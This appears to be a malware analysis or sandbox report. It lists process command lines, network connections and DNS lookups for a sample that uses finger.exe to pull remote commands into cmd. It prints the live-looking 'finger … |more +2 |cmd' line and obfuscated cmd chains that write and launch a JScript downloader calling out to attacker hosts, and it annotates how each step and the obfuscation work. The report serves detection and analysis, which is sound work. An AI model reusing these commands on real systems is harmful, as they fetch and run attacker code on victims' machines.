Technical Information
- '<SYSTEM32>\finger.exe' ok@kraais.suanfemaspi.top
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\MGY.js"
- %LOCALAPPDATA%\mgy.js
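- 'kr####.suanfemaspi.top':79
- 'ya####.#ua5ysl406xz.monster':80
  (Note: these masked names appear to correspond to the hosts shown in full in the command lines of this report, kraais[.]suanfemaspi[.]top and yaeimj[.]8ua5ysl406xz[.]monster. Port 79 is the finger service port, which matches the finger.exe invocation.)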
- 'cl###flare.com':443
- 'microsoft.com':80
- 'kr####.suanfemaspi.top':79
- 'cl###flare.com':443
- DNS ASK kr####.suanfemaspi.top
- DNS ASK ya####.#ua5ysl406xz.monster
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
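- '<SYSTEM32>\cmd.exe' /c finger ok@kraais.suanfemaspi.top |more +2 |cmd
  (Note: the finger client queries the remote host over TCP port 79, `more +2` starts the output at a line offset so the leading lines of the reply are dropped, and the remaining text is piped into a new cmd instance. The server's reply is therefore run as commands. finger.exe contacting an external host, or feeding its output to a shell, is uncommon in normal use and is a practical detection point.)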
- '<SYSTEM32>\cmd.exe'
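- '<SYSTEM32>\cmd.exe' /V/D/c "SEt TMQM=.j&&SEt VTKUR=vrXHWarrXHW a =rXHW 'scrXHWrirXHWptrXHW:'; b =rXHW 'hrXHWTtPrXHW:'; GrXHWetrXHWObjrXHWecrXHWt(rXHWa+b+'&&sET ZJQC=FVFLEFVFLEyaeimj.8ua5ysl406xz.monsterFVFLE?1FVFL...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p MR7BN="%VTKUR:rXHW=%%ZJQC:FVFLE=/%" 0<nul 1>%LOCALAPPDATA%\MGY%TMQM%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start %LOCALAPPDATA%\MGY%TMQM%s "
- '<SYSTEM32>\cmd.exe' /c start %LOCALAPPDATA%\MGY.js
  (Note: the variables are padded with filler strings that the second command strips: `rXHW` is deleted from VTKUR and `FVFLE` is replaced by `/` in ZJQC. The result is a one-line script, `var a = 'script:'; b = 'hTtP:'; GetObject(a+b+'//yaeimj[.]8ua5ysl406xz[.]monster/?1…`. The report truncates the command line, so the rest of the URL is not shown. `set /p` with input from nul prints that text as its prompt, and the redirect writes it to %LOCALAPPDATA%\MGY.js (TMQM is `.j`, followed by a literal `s`). The file is then launched with `start` and runs under wscript.exe, as listed at the top of this report.)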